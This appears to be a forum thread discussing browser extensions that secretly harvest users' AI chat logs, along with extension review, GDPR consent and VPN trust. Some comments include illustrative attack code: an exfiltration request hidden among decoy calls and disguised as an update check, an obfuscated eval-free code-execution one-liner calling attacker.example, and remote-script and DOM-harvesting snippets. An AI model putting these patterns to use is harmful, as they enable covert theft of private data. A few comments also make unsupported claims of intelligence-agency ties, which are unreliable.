What is the economic value of all these AI chat logs? I can see it being useful for building advertising profiles. But I wonder if it's also just sold as training data to people trying to build their own models?
Pretty easy to match up those logs with browser fingerprinting to identify the actual user. Then you have "do you want to purchase what Mr. Foo Bar is prompting the LLM?"
So much of what's aimed at nontechnical consumers these days is full of dishonesty and abuse. Microsoft kinda turned Windows into something like this, you need OneDrive "for your protection", new telemetry and ads with every update, etc.
In much of the physical world thankfully there's laws and pretty-effective enforcement against people clubbing you on the head and taking your stuff, retail stores selling fake products and empty boxes, etc.
But the tech world is this ever-boiling global cauldron of intangible software processes and code - hard to get a handle on what to even regulate. Wish people would just be decent to each other, and that that would be culturally valued over materialism and moneymaking by any possible means. Perhaps it'll make a comeback.
This was a nearly poetic way to put it. Thank you for ascribing words to a problem that equally frustrates me.
I spend a lot of time trying to think of concrete ways to improve the situation, and would love to hear people's ideas. Instinctively I tend to agree it largely comes down to treating your users like human beings.
The situation won’t be improved for as long as an incentive structure exists that drives the degradation of the user experience.
Get as off-grid as you possibly can. Try to make your everyday use of technology as deterministic as possible. The free market punishes anyone who “respects their users”. Your best bet is some type of tech co-op funded partially by a billionaire who decided to be nice one day.
And still, there is plenty of software that you can't run on anything but Windows. That's a major blocker at this point and projects like 'mono' and 'wine', while extremely impressive, are still not good enough to run that same software on Linux.
I wouldn't be surprised if this was done by one of those AI companies themselves!
Remember Facebook x Onavo?
"Facebook used a Virtual Private Network (VPN) application it acquired, called Onavo Protect, as a surveillance tool to monitor user activity on competing apps and websites"
This is exactly why we need more transparency in analytics tools. When building products that handle user data, the "free" model almost always means you're the product.
The scary part is these extensions had Google's "Featured" badge. Manual review clearly isn't enough when companies can update code post-approval. We need continuous monitoring, not just one-time vetting.
For anyone building privacy-focused tools: making your data collection transparent and your business model clear upfront is the only way to build trust. Users are getting savvier about this.
I'm not a spy so I don't know, but surely in most scenarios it's a lot easier to just ask someone for some data than it is to hack/steal it. 25 years of social media has shown that people really don't care about what they do with their data.
Huh? Of course they would: It's way less work than defeating TLS/SSL encryption or hacking into a bunch of different servers.
Bonus points if the government agency can leave most of the work to an ostensibly separate private company, while maintaining a "mutual understanding" of government favors for access.
Why wouldn't they? It isn't that you need to, just that obviously you would. You engage with the extension owners by sending an email from a director of a data company instead of as a captain of some military operation. The hit rate is going to be much higher with one of the strategies.
It would have been no less surprising to me had it been a US company, but it certainly fits the cultural stereotype of callousness that particular country has been openly displaying in recent years.
Some people have mentioned that this is a U.S.-incorporated company (Delaware). Recommend reading Moneyland by Oliver Bullough if you want to know more about the U.S. role as the new shell-company haven.
Somewhat ironically, this article has significant amounts of AI writing in it. (I've done a lot of AI writing in my own sites, and have been learning how to smother "the voice". This article doesn't do a good job of smothering.)
I think this is most likely what happened. The update/review process for extensions is broken. Apparently you can add any malicious functionality after you’re in and also keep any badges and recommendations.
Why would one expect privacy with a VPN? And a free one at that? On the web all traffic is encrypted point to point, which means individual sites could compromise your privacy, but there is no single funnel through which to lose all your data. A VPN is exactly that: all data goes through a single funnel, and they can target anything they want.
Thanks. The last fetched page on archive.org is from 2025-01-26 [1]; it was removed after this date and before 2025-02-13. 155,477 users at the moment, and the 1-star reviews were mostly about it not working. It's interesting that the developers didn't care to remove the button directing to the Firefox add-on page for at least several months after the removal. Maybe it was some kind of PR compromise; they probably thought that listing it with a link to a broken page was better than not listing it at all.
A review page [2] mentions that this add-on is a peer-to-peer VPN; not having its own dedicated servers already makes it suspicious.
> Probably not. All side effects need to go through the JS side. So you can always see where HTTP calls are made
That can be circumvented by bundling the conversations into one POST to an API endpoint, along with a few hundred calls to several dummy endpoints to muddy the waters. Bonus points if you can make it look like a routine update script.
It'll still show up in the end, but at this point your main goal is to delay the discovery as much as you can.
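A minimal sketch of that pattern (every endpoint and variable here is hypothetical): one real exfiltration request buried in decoy traffic and dressed up as an update check.

  const harvested = [];  // stand-in for the captured conversations
  // decoy traffic to muddy the waters:
  Array.from({ length: 200 }, (_, i) =>
    fetch(`https://cdn.example/assets/${i}.json`, { method: 'POST', body: '{}' }));
  // the one request that matters, disguised as an update check:
  fetch('https://api.example/v2/update-check', {
    method: 'POST',
    body: JSON.stringify({ payload: harvested }),
  });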
This is a huge trust failure. A VPN or ad blocker quietly harvesting full AI conversations is the opposite of what users expect, and the fact that these extensions were featured makes it even worse. This really puts the effectiveness of browser extension reviews into question.
Why is a security researcher using a free VPN? The standard wisdom is "if it's free, you're the product". So you're going to proxy all your sensitive traffic through a free thing? It's not great to trust paid services with your data, never mind free stuff.
Sometimes knowing tech makes us think we're somehow better and can bypass high level wisdom.
They are not. They found it by searching for extensions that had the capability to exfiltrate data.
> We asked Wings, our agentic-AI risk engine, to scan for browser extensions with the capability to read and exfiltrate conversations from AI chat platforms.
Let's say we don't trust ublock. At the very least it is still blocking ad networks which do reduce internet performance and are vectors of exploitation, so it is still adding value whether you trust it or not.
Nice write up. It would be great if the authors could follow up with a detailed technical walk through of how to use the various tooling to figure out what an extension is really doing.
Could one just feed the extension and a good prompt to claude to do this? Seems like automation CAN sniff this kind of stuff out pretty easily.
Why can't these browser extensions live in a guarded sandbox? Extensions are given full access to whatever is available on any page. I had the legacy React Developer Tools and Redux DevTools installed for years. What a great attack vector.
Note that in the profile of a model on OpenRouter, under Data Policy, there is a field called "Prompt Training". Some models clearly state that prompt training is true, even for paid models.
Do we know how much that type of content sells for? Not that I'm interested in entering the market, but the economics of that kind of thing are always fascinating. How much are buyers willing to pay for AI conversations? I would expect the value to be pretty low.
I doubt it's the actual conversations that are valuable; it's the aggregated insights.
Think: is my brand getting mentioned more in AI chats? Are people associating positive or negative feelings towards it? Are more people asking about this topic lately?
Let's assume that people are discussing medical conditions in these conversations - I think that insurance companies would be pretty interested to get this kind of data in their hands.
What would the fallout look like if too many people start to have horror stories about how much their lives were destroyed by incriminating, downright nasty, or just wrong AI chat history? It would suddenly become a tool where you can't be honest. If it's not already.
> A "Featured" badge from Google, meaning it had passed manual review and met what Google describes as "a high standard of user experience and design."
Trusting Google with your privacy is like putting the fox in charge of the henhouse.
The only extensions I have installed are dark reader and ublock origin. Would be nice if I could disable auto updating for them somehow and run local pinned versions...
From my experience, Google does not do a thorough app review. Reviewers get maybe a few minutes to review and move on due to the volume of apps awaiting review.
Can we please, please stop using this absolutely deprecated proverb? As YouTube Lite, Samsung fridges with ads, cars with telemetry, etc. have shown, even if you pay, you are still subject to manipulation, spyware, ads and telemetry. It has absolutely nothing to do with payment.
I hate to be that guy, but I am having a difficult time verifying any of this. How likely is it that this is entirely hallucinated? Can anyone independently verify this?
Pro tip: never install any browser extensions. Avoid like the plague. I had a couple installed that were "legitimate" and I have direct evidence of them leaking/selling my browsing data. Just avoid.
Note that this is a pretty blatant GDPR violation and you should report this to the local data protection agency if you are an EU resident and care about this (especially if you've used this extension). Their privacy policy claims the data collection is consent-based and that the app settings also let you revoke this consent. According to the article, the latter isn't the case and the user is never informed of the extent of the collection and the risk of sensitive or specially protected personal information (e.g. sexual orientation) being part of the data they're collecting. Their privacy policy states the collected data is filtered to remove this kind of information, but that's irrelevant because processing necessarily happens after collection, and the GDPR already applies at the start of that pipeline.
If Urban VPN is indeed closely affiliated with the data broker, a GDPR fine might also affect that company too given how these fines work. There is a high bar for the kind of misconduct that would result in a fine but it seems plausible that they're being knowingly and deliberately deceptive and engaging in widespread data collection that is intentionally invasive and covert. That would be a textbook example for the kind of behavior the GDPR is meant to target with fines.
The same likely applies to the other extensions mentioned in the article. Yes, "if the product is free, you are the product" but that is exactly why the GDPR exists. The problem isn't that they're harvesting user data but that they're being intentionally deceptive and misleading in their statements about this, claim they are using consent as the legal basis without having obtained it[0], and they're explicitly contradicting themselves in their claims ("we're not collecting sensitive information that would need special consideration but if we do we make sure to find it and remove it before sharing your information but don't worry because it's mostly used in aggregate except when it isn't"). Just because you expect some bruising when picking up martial arts as a hobby doesn't mean your sparring partner gets to pummel your face in when you're already knocked out.
[0]: Because "consent" seems to be a hard concept for some people to grasp: it's literally analogous to what you'd want to establish before having sex with someone (though to be fair: the laws are much more lenient about unclear consent for sex because it's less reasonable to expect it to be documented with a paper trail like you can easily do for software). I'll try to keep it SFW but my place of work is not your place of work so think carefully if you want to copy this into your next Powerpoint presentation.
Does your prospective sexual partner have any reason to strongly believe that they can't refuse your advances because doing so would limit their access to something else (e.g. you took them on a date in your car and they can't afford a taxi/uber and public transport isn't available so they rely on you to get back home, aka "the implication")? Then they can't give you voluntary consent because you're (intentionally or not) pressuring them into it. The same goes if you make it much harder for them to refuse than to agree (I can't think of a sex analogy for this because this seems obvious in direct human interactions but somehow some people still think hiding "reject all non-essential" is an option you are allowed to hide between two more steps when the "accept all" button is right there even if the law explicitly prohibits these shenanigans).
Is your prospective sexual partner underage or do they appear extremely naive (e.g. you suspect they've never had any sex ed and don't know what having sex might entail or the risks involved like pregnancy, STIs or, depending on the acts, potential injuries)? Then they probably can't give you informed consent because they don't fully understand what they're consenting to. For data processing this would be failure to disclose the nature of the collection/processing/storage that's about to happen. And no, throwing the entire 100 page privacy policy at them with a consent dialog at the start hardly counts the same way throwing a biology textbook at a minor doesn't make them able to consent.
Is your prospective sexual partner giving you mixed signals but seems to be generally okay with the idea of "taking things further"? Then you're still missing specific consent and better take things one step at a time checking in on them if they're still comfortable with the direction you're taking things before you decide to raw dog their butt (even if they might turn out to be into that). Or in software terms, it's probably better to limit the things you seek consent for to what's currently happening for the user (e.g. a checkbox on a contact form that informs them what you actually intend to do with that data specifically) rather than try to get it all in one big consent modal at the start - this also comes with the advantage that you can directly demonstrate when and how the specific consent relevant to that data was obtained when later having to justify how that data was used in case something goes wrong.
Is your now-active sexual partner in a position where they can no longer tell you to stop (e.g. because they're tied up and ball-gagged)? Then the consent you did obtain isn't revokable (and thus again invalid) because they need to be able to opt out (this is what "safe words" are for and why your dentist tells you to raise your hand where they can see it if you need them to stop during a procedure - given that it's hard to talk with someone's hands in your mouth). In software this means withdrawing consent (or "opting out") should be as easy as it was to give it in the first place - an easy solution is having a "privacy settings" screen easily accessible in the same place as the privacy policy and other mandatory information that at the very least covers everything you stuffed in that consent dialog I told you not to use, as well as anything you tucked away in other forms downstream. This also gives you a nice place to link to at every opportunity to keep your user at ease and relaxed to make the journey more enjoyable for both of you.
They're probably only incorporated in the US, so it's meaningless. If they plan to establish a corp in the EU they'll just put it in Ireland and bribe Ireland like all of US big tech does. This is a solved thing.
What sort of argument is that? Just because I need to eat (also, let's be real, the developers/owners behind this app are not struggling to put food on the table) doesn't excuse me doing unethical/illegal things (and this behaviour is almost certainly illegal, in the EU at least).
The guy who holds people up for money in the alley is a human too, people forget, and needs to pay for food and a place to live. Of course they do too.
I stick to extensions that Mozilla has manually vetted as part of the Firefox recommended extensions program.
> Firefox is committed to helping protect you against third-party software that may inadvertently compromise your data – or worse – breach your privacy with malicious intent. Before an extension receives Recommended status, it undergoes rigorous technical review by staff security experts.
https://support.mozilla.org/en-US/kb/recommended-extensions-...
I know that Google hates to pay human beings, but this is an area that needs human eyes on code, not just automated scans.
Yeah, IT pros and tech-aware "power" users can always take these measures, but the very availability of poorly or maliciously coded extensions and apps in popular app stores makes it a problem: normies will get swayed by the swanky features the software promises and will click past all misgivings and warnings. Social engineering attacks are impossible to prevent using technical means alone. Either a critical mass of ordinary people needs to become more safety/privacy conscious, or general-purpose computing devices will become more and more niche, as the very industry which creates these problems in the first place through poor review also sells the solution of universal thin clients and locked-down devices, of course with the very happy cooperation of governments everywhere.
> I stick to extensions that Mozilla has manually vetted as part of the Firefox recommended extensions program.
If you're feeling extra-paranoid, the XPI file can be unpacked (it's a ZIP) to check the code over for anything suspicious or unreasonably complex, particularly if the browser extension is supposed to be something simple like "move the up/down vote arrows further apart on HN". :P
While that doesn't solve the overall ecosystem issue, every little bit helps. You'll know it's time to run away if extensions become closed-source blobs.
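As a crude first pass over the unpacked files, even a dumb scan for network-capable APIs narrows down which files deserve a close read. A Node sketch, assuming the XPI has been extracted into unpacked-xpi/:

  const fs = require('fs');
  const path = require('path');
  const hits = [];
  (function walk(dir) {
    for (const name of fs.readdirSync(dir)) {
      const p = path.join(dir, name);
      if (fs.statSync(p).isDirectory()) walk(p);
      else if (p.endsWith('.js') &&
               /fetch\(|XMLHttpRequest|sendBeacon|WebSocket/.test(fs.readFileSync(p, 'utf8')))
        hits.push(p);  // files that can talk to the network
    }
  })('unpacked-xpi');
  console.log(hits);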
You can also, more conveniently, plug an extension's URL into this viewer:
https://robwu.nl/crxviewer/
The problem is most codebases are huge: millions of lines when you include all the libraries etc.
Often they're compiled from TypeScript etc., making manual review almost impossible.
And if you demand the developer send in the raw uncompiled stuff you have the difficulty of Google/Mozilla having to figure out how to compile an arbitrary project which could use custom compilers or compilation steps.
Remember that someone malicious won't hide their malicious code in main.ts... it's gonna be deep inside a chain of libraries (which they might control too, or might have vendored).
For example, the following hidden anywhere in the codebase allows arbitrary code execution even under the most stringent JavaScript security policy (no eval etc):
I=c=>c.map?c[0]?c.reduce((a,b)=>a[b=I(b)]||a(b),self):c[1]:c
(How it works is left as an exercise for the reader)
The actual code to run can be delivered as an innocuous looking JavaScript array from some server, and potentially only delivered to one high value target.
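To make the delivery mechanism concrete without giving the whole exercise away: fed to I, strings become property lookups starting from self, and anything that isn't a property gets passed as a call argument. So a server response as innocent-looking as this (URL hypothetical) turns into a network call:

  I(["fetch", "https://attacker.example/collect?d=..."])  // becomes self.fetch(url)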
Probably off topic: I once tried to find bad code in a WordPress theme. And it was hidden so deep and inconspicuously. The only thing that really helped was to do a diff.
In JS it can be much harder to find anything suspicious, since the code can be minified.
But back to Firefox: My house, my rules. So let external developers set some more strict rules that discourage the bad actors a little.
The question is, does Mozilla rigorously review every single update of every featured extension? Or did they just vet it once, and a malicious developer may now introduce data collection or similar "features" through a minor update of the extension and keep enjoying the "Recommended" badge from Mozilla?
This may also be the reason for the extension being "Featured" on the Chrome Web Store: Google vetted it once, and didn't think about it for each update.
> The question is, does Mozilla rigorously review every single update of every featured extension?
Yes.
This is just spreading FUD where an answer could have been provided.
> Before an extension receives Recommended status, it undergoes rigorous technical review by staff security experts.
https://support.mozilla.org/en-US/kb/recommended-extensions-...
Funny enough, the article mentions this extension was manually reviewed:
> A "Featured" badge from Google, meaning it had passed manual review and met what Google describes as "a high standard of user experience and design."
I at some point vetted the extensions for myself.
What I saw in the Mozilla extensions store was anything from minified code (what is this? it might have been useful in the late 90's on the web, but it surely isn't necessary as part of an extension that doesn't download its code from anywhere) to full-on data-stealing code (reported, and Mozilla removed it after 2 weeks or so).
I don't trust the review process one bit if they allow minified code in the store. For the same reason, "manual" review doesn't fill me with any extra warm feeling of confidence. I can look at minified code manually myself, but it's just gibberish, and suspicious code is much harder to discern.
Also, I just stopped using third party extensions, except for 2 (violentmonkey, ublock), so I no longer do reviews. I had a script that would extract the XPI into a git repository before update, do a commit and show me a diff.
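For anyone wanting to reproduce that workflow, a minimal Node sketch (assuming unzip and git are on PATH and extension-repo was git init-ed once):

  const { execSync } = require('child_process');
  const sh = (cmd) => execSync(cmd, { stdio: 'inherit' });
  sh('unzip -o new-version.xpi -d extension-repo');  // overwrite the tracked copy
  sh('git -C extension-repo add -A');
  sh('git -C extension-repo diff --cached');         // review the changes
  sh('git -C extension-repo commit -m "extension update"');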
A friendly extension store for security-conscious users would make it easy to review the source code of an extension before hitting install or update. This is about the most security-sensitive code that exists in the browser.
> I know that Google hates to pay human beings, but this is an area that needs human eyes on code, not just automated scans.
I think we need both human review and for somebody to create an antivirus engine for code that's on par with the heuristics of good AV programs.
You could probably do even better than that since you could actually execute the code, whole or piecewise, with debugging, tracing, coverage testing, fuzzing and so on.
The article says the extension has been "manually reviewed" by Google.
...and we all know that Google never does anything "manually", so I'd take that with the appropriate serving of salt.
The article states that Google has done the same for this extension as part of providing its "Featured" badge.
The same applies to code editor extensions!
The company behind this appears to be "real" and incorporated in Delaware.
> Urban Cyber Security INC
https://opencorporates.com/companies/us_de/5136044
https://www.urbancybersec.com/about-us/
I found two addresses:
> 1007 North Orange Street 4th floor Wilmington, DE 19801 US
> 510 5th Ave 3rd floor New York, NY 10036 United States
and even a phone number: +1 917-690-8380
https://www.manhattan-nyc.com/businesses/urban-cyber-securit...
They look really legitimate on the outside, to the point that there's a fair chance they're not aware what their extension is doing. Possibly they're "victim" of this as well.
> They look really legitimate on the outside
If that looks *really legitimate* to you, then you might be easily scammed. I'm not saying they're not legitimate, but nothing that you shared is a strong signal of legitimacy.
It would take perhaps a few hundred dollars a month to maintain a business that looked exactly like this, and maybe a couple thousand to buy one that somebody else had aged ahead of time. You wouldn't have to have any actual operations. Just continuously filed corporate papers, a simple brochure website, and a couple of virtual office accounts in places so dense that people don't know the virtual address sites by heart.
Old advice, but be careful believing what you encounter on the internet!
https://www.manhattanvirtualoffice.com/
The NY address is a virtual office.
https://themillspace.com/wilmington/
The DE address is a virtual office plus coworking facility.
Wow the virtual office concept is so beyond shady. I wonder if there are any legitimate uses of it?
Amazing.
> Urban VPN is operated by Urban Cyber Security Inc., which is affiliated with BiScience (B.I Science (2009) Ltd.), a data broker company.
> This company has been on researchers' radar before. Security researchers Wladimir Palant and John Tuckner at Secure Annex have previously documented BiScience's data collection practices. Their research established that:
> BiScience collects clickstream data (browsing history) from millions of users
> Data is tied to persistent device identifiers, enabling re-identification
> The company provides an SDK to third-party extension developers to collect and sell user data
> BiScience sells this data through products like AdClarity and Clickstream OS
> The identical AI harvesting functionality appears in seven other extensions from the same publisher, across both Chrome and Edge:
Hmm.
> They look really legitimate on the outside
Hmm, what, no.
We have a data collection company, thriving financially on the lack of privacy protections and the indiscriminate collection and collating of data, connected to eight data-siphoning "Violate Privacy Network" apps.
And those apps are free... Which is seriously default sketchy if you can't otherwise identify some obviously noble incentives to offer free services/candy to strangers.
Once is happenstance, twice is coincidence, three (or eight) times is enemy action.
The only thing that could possibly make this look any worse is discovering a connection to Facebook.
Israeli company. No doubt some Mossad front.
You can get a mailing address and phone number for like $15/mo. You can incorporate a US business for only a couple hundred dollars.
Is the agent address real?
1000 N. WEST ST. STE. 1501, WILMINGTON, New Castle, DE, 19801
It almost matches this law firm's address, but not quite.
https://www.skjlaw.com/contact-us/
Brandywine Building 1000 N. West Street, Suite 1501 Wilmington DE 19801
Being a real business doesn't necessarily mean they can be trusted. Real companies do shady stuff all the time.
This also works in reverse: shady companies do real business. While the reason might be different the end result is the same.
> Urban VPN is operated by Urban Cyber Security Inc., which is affiliated with BiScience (B.I Science (2009) Ltd.), a data broker company.
BiScience is an Israeli company.
Israel is the new Russia, I guess.
Judging from their website, all links eventually point to either the VPN extension download website, or a signup link. I'm not surprised if some nation state supported APT is behind this shit.
I am surprised because google review team rejects half of my extensions and apps.
Sometimes things don't make sense to me, like how "Uber Driver app access background location and there is no way to change that from settings" - https://developer.apple.com/forums/thread/783227
If Google would care at all for their users, they'd tell WhatsApp to not require the use of the Contacts permission only to add names to numbers when you don't share the Contacts with the App.
Or they'd tell WhatsApp to allow granting microphone permissions for one single call, instead of requesting permanent microphone permissions. All apps that I know of respect the flow of "Ask every time", all but Meta's app.
Google just doesn't care.
That's all opinionated, and the latter is part of the OS, not WhatsApp. Not liking how an app works does not compare to an app exfiltrating data without your consent.
I wish there was another button on those contact permission boxes which would tell the app you've granted permissions. But when they try to read your contacts, send them randomly generated junk. Fake phone numbers. Fake names.
Or even better, mix in some real names and phone numbers but change all the other details. I want data brokers to think I live in 8 different countries. I want my email address to show up for 50 different identities. Good luck sorting that out.
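A toy sketch of the kind of junk such a stub could hand back (every value fabricated):

  const rand = (n) => Math.floor(Math.random() * n);
  const surnames = ['Smith', 'Ng', 'Okafor', 'Ivanova', 'Silva'];
  const fakeContact = () => ({
    name: String.fromCharCode(65 + rand(26)) + '. ' + surnames[rand(surnames.length)],
    phone: '+1' + (2000000000 + rand(800000000)),  // junk, but well-formed
  });
  console.log(Array.from({ length: 50 }, fakeContact));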
I think what's going on there is that "While using" includes when a navigation app is running in the background, which is visible to the user (via e.g. a blue status bar pill). "Always" allows access even when it's not clear to the user that an app is running.
The developer documentation is actually pretty clear about this: https://developer.apple.com/documentation/bundleresources/ch...
This might be a case of app permissions just being poorly delineated. E.g. I've seen Android apps require "location data" access just because they want to connect over bluetooth or manage WiFi or something (not entirely sure which one it was specifically) because that is actually the same permission and the wording in the permission modal is misleading.
They are the same permission because you can guess the user’s location using Bluetooth and WiFi.
The permissions model for browser extensions has always been backwards. You grant full access at install time, then cross your fingers that nothing changes in an update.
What we actually need is runtime permissions that fire when the extension tries to do something suspicious - like exfiltrating data to domains that aren't related to its stated function. iOS does this reasonably well for apps. Extensions should too.
The "Recommended" badge helps but it's a bandaid. If an extension needs "read and change all data on all websites" to work, maybe it shouldn't work.
A big problem is also that you can pretty much only grant permission for one specific site or all sites and this very much depends on which of those two options the extension uses.
For example there's no need for the "inject custom JS or CSS into websites" extensions to need permission to read and write data on every single website you visit. If you only want to use them to make a few specific sites more accessible to you that doesn't mean you're okay with them touching your online banking. Especially when most of these already let you define specific URLs or patterns each rule/script should apply to.
I understand that there are still vectors for data exfiltration when the same extension has permissions on two different sites and that "code injection as a service" is inherently risky (although cross-origin policies can already lock this down somewhat) but in 2025 I'd hope we could have a more granular permission model for browser extensions that actually supports sandboxing.
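Manifest V3 does gesture at this with optional host permissions, where an extension ships with no host access and asks per origin at runtime; the catch is that the extension itself has to opt into that model. A sketch (origin chosen purely as an example):

  // manifest.json declares no host access up front, only:
  //   "optional_host_permissions": ["https://*/*"]
  // then the extension asks for one specific origin when the user enables a rule:
  chrome.permissions.request(
    { origins: ['https://example.com/*'] },
    (granted) => console.log('access granted?', granted)
  );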
You can grant access to a few specific sites (in chrome at least), it's just hidden in settings and you need to configure it manually.
“A few weeks ago, I was wrestling with a major life decision. Like I've grown used to doing, I opened Claude”
Is this where we’re at with AI?
People used to cast lots to make major life decisions.
Putting a token predictor in the mix — especially one incapable of any actual understanding — seems like a natural evolution.
Absolved of burden of navigating our noisy, incomplete and dissonant thoughts, we can surrender ourselves to the oracle and just obey.
Yes, but it's incredibly dangerous when the operator of the token predictor can give you, personally, different behavior and can influence your decisions even more directly than before.
Some people are incapable of internal thought. They have to verbalise/write down their thoughts so they can hear/read them back, and that's how they make progress. In a way, these people's brains do work like LLMs.
There is no evidence whatsoever that having or not having inner monologue confers any advantages or disadvantages.
For all we know, it's just two paths the brain can take to arrive at the same destination.
It does strike me as pretty crazy, but I'm at the other end of the spectrum, I almost never think about using an AI for anything. I've tried Claude I think, twice (it wasn't very helpful). The only other AI I've ever used are the "AI summaries" that Duck Duck Go sometimes shows at the top of its search results.
If this is surprising to you then your circle is fairly unusual.
For example HBR recently reported the number 1 use for ChatGPT is "Therapy/companionship"
https://archive.is/Y76c5
Delegating life decisions to AI is obviously quite stupid but it can really help lay out and question your thoughts even if it's obviously biased.
I constantly use AI like this. For life decisions, for complicated logistics situations, for technical decisions and architectures, etc. I'm not having it make any decisions for me, I'm just talking through things with another entity who has a vast breadth of knowledge, and will almost always suggest a different angle or approach that I hadn't considered.
Here's an example of the kinds of things I've talked with ChatGPT about in the last few weeks:
- I'm moving to a new area and I share custody of my daughter, so this adds a lot of complications around logistics. Talked through all that.
- Had it research niche podcasts and youtube channels for advertising / sponsorship opportunities for my SaaS
- Talked through a really complex architecture decision that's a mix of technical info and big tradeoffs for cost and customer experience.
- Did some research and talked through options for buying two new vehicles for the upcoming move, and what kinds work best for use cases (which are complex)
- Lots and lots of discussions around complex tax planning for 2026 and beyond
Again, these models have vast knowledge, as well as access to search and other tools to gather up-to-date info and sift through it far faster than I can. Why wouldn't I talk through these things with them? In my experience, with a few guardrails ("double check this" or "search and verify that X..."), I'm finding it more trustworthy than most experts in those fields. For example, I've gotten all kinds of incorrect tax advice from CPAs. Sometimes ChatGPT is out of date, but it's generally pretty accurate around taxes ime, especially if I have it search to verify things.
A certain type of person loves nothing more than to spill their guts to anyone who will listen. They don’t see their conversational partners as other equally aware entities—they are just a sounding board for whatever is in this person's head. So LLMs are incredibly appealing to these folks. LLMs never get tired or zone out or make snarky responses. Add in chatbots’ obsequious enabling, and these folks are instantly hooked.
Do you just mean external vs internal processing/thinking?
As someone who has witnessed BiScience tracking in the past, I am not surprised to hear that they might be involved in all this. They came up when researchers investigated the Cyberhaven compromise [1][2]. Though the correlation might not all be there, it's kind of disappointing.
[1] https://secureannex.com/blog/cyberhaven-extension-compromise.... [2] https://secureannex.com/blog/sclpfybn-moneitization-scheme/ (referenced in the article)
I don't understand why so many people are using / trusting VPNs
"Let us handle all your internet traffic.. you can trust us.. we're free!"
No thank you.
ISPs are so heavily regulated that they will give any federal or government agency free access to future and past internet connection information that is directly tied to your real identity.
Meanwhile, reputable VPN providers like Mullvad offer their service without KYC and leave the feds empty-handed when they knock on their doors.
https://mullvad.net/en/blog/mullvad-vpn-was-subject-to-a-sea...
For the same reason you trust your ISP? It handles all your internet traffic; and depending on where you live, probably has government-mandated back doors, or is willing to cooperate with arbitrary requests from law-enforcement agencies.
That's why TLS exists, after all. All Internet traffic is wiretapped.
Because I pay the ISP, it is heavily regulated, and they actually make a lot of money from being an ISP?
I'd be significantly more suspicious by default of ISPs that charge no money.
> That's why TLS exists, after all.
That protects you if you're using standard methods to connect. Installed software gets to bypass it.
> I don't understand why so many people are using [Cloudflare].
> "Let us handle all your internet traffic.. you can trust us.. []"
TLS does not help when most Internet traffic is passed through a single entity which, by default, will use an edge TLS certificate and re-encrypt all data passing through, and so has decrypted plaintext visibility into all data transmitted.
I have a contract with my ISP, I can know who runs the company and I can sue the company if they violate anything they promised.
TLS doesn't hide IP addresses.
A lot of people from poor countries, where they can't access a lot of websites/services and also can't pay for a VPN, use these "free" VPNs,
but other than that I would never trust anything other than Mullvad/IVPN/ProtonVPN
The use case is people that are urged to view something that is blocked (torrent / adult / gambling). They want it now, and they don't want to get involved with some shady company that slaps on a 2 year contract and keeps extending indefinitely. These people instead find "free vpn" in the web store and decide to give it a try.
VPNs are just one example. How many chrome extensions do you have that you don't use all the time, like adblockers, cookie consent form handlers or dark mode?
Me personally? I'm using Firefox with EFF privacy badger. No others.
Yeah free VPN is totally a problem, but there's TLS so at least those users aren't getting their bank account information stolen.
TLS protects the traffic when the app is installed somewhere else, but not inside the browser itself: the browser handles TLS termination, so an extension sees the content after decryption.
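Concretely, a content script runs inside the page after decryption, so harvesting is plain DOM access; a sketch with a hypothetical selector:

  // content script: TLS is already terminated by the time this runs
  const messages = [...document.querySelectorAll('.chat-message')]
    .map((el) => el.textContent);  // the "encrypted" conversation, in the clear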
Does TLS mean certificate pinning? Can't a VPN alter DNS queries to return a proxy of your bank's website, using a forged certificate?
Google needs to act on removing these extensions and doing more thorough code reviews. Reputability is everything, and extensions can actually be valuable (e.g. LastPass, my own extension Ward).
There has to be a better system. Maybe a public extension safety directory?
I don't understand how code review would catch this. The extension advertises itself as an AI protection tool that monitors your AI interactions. The code is basically consistent with the stated purpose. That it doesn't stop collecting data when you turn off the UI alerting is perhaps an inconsistency, but I think that's debatable (is there a rule in Google's terms that says data collection is contingent on UI alerts being enabled?). I'm curious what workflow or decision tree you'd expect a code review process to follow here that results in this being rejected. The problem here doesn't seem to be code-related; it's policy-related: what are they doing with the information, not that the extension has code to collect it.
I’m not sure there’s much more juice to squeeze here via automated or semi-automated means. They could perhaps be doing these kind of human-in-the-loop reviews themselves for all extensions that hit a certain install count, but that’s not a popular technique at Google.
Chrome extension codebases are fairly basic, I think there's room to build an agentic code scanner for these, but the juice probably isn't worth the squeeze to justify for them $$$-wise. Manual reviews I agree are expensive and dicey.
Do you think Google wants to have the extensions system, given that this is how people block ads?
Ad blockers on Chromium-based browsers were severely crippled by Manifest V3. They're fine with extensions (and apparently malware) as long as users can't effectively block their tracking/ads.
I wouldn’t be surprised if it goes away - it’s very “old Google”. We’re moving more towards walled gardens.
Google is doing code review on extensions?
I’m not sure, but whenever I cut a new release I upload my extension code and it goes through a review period before they publish.
Is this even a problem that code review could find? Once they have your conversation data, what happens then isn't part of the plug-in.
You're not wrong, but one thing about scammy developers is they tend to be ballsy rather than covert. The Koi blog covers all the egregious code specifically for exfiltrating LLM conversations. This stuff would be a walking red flag in a public commit/PR.
I thought Manifest V3 was supposed to make Chrome extensions secure?
It's the reason they found it: the code was in the extension. Before Manifest V3, extensions could just load external scripts and there's no way you could tell what they were actually doing.
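For illustration, the old pattern was as simple as this (URL hypothetical); the reviewed package contained only the stub, while the actual behavior lived on a server the developer could change at any time:

    // Pre-MV3: inject a remotely hosted script. The reviewed code looks inert;
    // the payload is fetched at runtime and can differ per user or per day.
    const s = document.createElement("script");
    s.src = "https://cdn.example.invalid/payload.js";
    document.head.appendChild(s);

Manifest V3 requires all executable code to ship inside the reviewed package, which is why the harvesting logic was sitting there for researchers to find.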
> extensions could just load external scripts and there's no way you could tell what they were actually doing.
I do think security researchers would be able to figure out what scripts are downloaded and run.
Regardless, none of this seems to matter to end users whether the script is in the extension or external.
Wait, does that mean Manifest v3 is so neutered that it can't load a `<script>` tag into the page if an extension needed to?
If so, I feel like something that limited is hardly even a browser extension interface in the traditional sense.
Let me ask you this way: How do you think they make money?
I believe you may be missing the sarcasm of the post you are responding to.
I'm glad the extension system isn't broken (e.g. extensions being hacked). This is just scammy extensions to begin with. I've been scared of extensions since they were first offered (I did like using Greasemonkey to customize everything back in the 2000s/2010s), but I can't resist Privacy Badger and uBlock Origin since they are open source (but even then it's still a risk).
What is the economic value of all these AI chat logs? I can see it being useful for developing advertising profiles. But I wonder if it's also just sold as training data for people trying to build their own models?
Pretty easy to match up those logs with browser fingerprinting to identify the actual user. Then you have "do you want to purchase what Mr. Foo Bar is prompting the LLM?"
Not just advertising but market research. Loads of people want to know exactly what types of questions people are asking these chatbots.
